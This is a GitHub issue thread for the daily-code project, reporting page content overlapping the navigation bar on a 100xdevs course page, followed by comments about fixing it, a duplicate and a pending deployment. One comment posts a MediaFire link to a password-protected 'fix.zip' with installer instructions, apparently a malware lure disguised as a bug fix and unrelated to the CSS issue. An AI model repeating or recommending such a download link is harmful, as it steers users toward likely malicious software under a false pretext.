### ISSUE TITLE
bug: Content overlapping, should give some space from top

### ISSUE THREAD

**Issue by itzamanjain** [code100x/daily-code#595]
#### **Describe the bug**
The content in the displayed page is overlapping with the navigation or header, leaving insufficient space at the top. This makes the text or elements less readable and visually cluttered.

#### **To Reproduce**
1. go to https://projects.100xdevs.com/tracks/testing-1/Testing-in-the-MERN-Stack-10
Content is overlapping with navbar 

#### **Expected behavior**
There should be a sufficient margin or padding at the top of the content to prevent overlapping with the header or other elements above it. The content should be clearly visible without obstruction.

#### **Screenshots or GIFs**
Attached is a screenshot showing the overlapping issue.
![Screenshot 2024-08-28 104840](https://github.com/user-attachments/assets/02c1b4ee-17a7-4b2c-9a0e-e3a300ec731a)

#### **Info (please complete the following information):**
- **Browser:** [e.g., Chrome, Safari]
- **Version:** [e.g., 22]

#### **Additional context**
This issue may affect the readability of the content and the overall user experience. It might be necessary to adjust the CSS to add padding or margin at the top of the content.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by toufiqfarhan0** [comment]
it's working fine for me

**Comment by karan-vaishnav** [comment]
may I try to fix this issue?

**Comment by Jayant818** [comment]
I want to fix this issue

**Comment by imSaikirann** [comment]
i want to fix this

**Comment by ItsFlash10** [comment]
duplicate #584

**Comment by devsargam** [comment]
Already resolved

**Comment by gojekarthik** [comment]
@devsargam resolved issue did not reflect

**Comment by ItsFlash10** [comment]
> @devsargam resolved issue did not reflect

It hasn't been deployed yet but you can verify it by running the code locally.
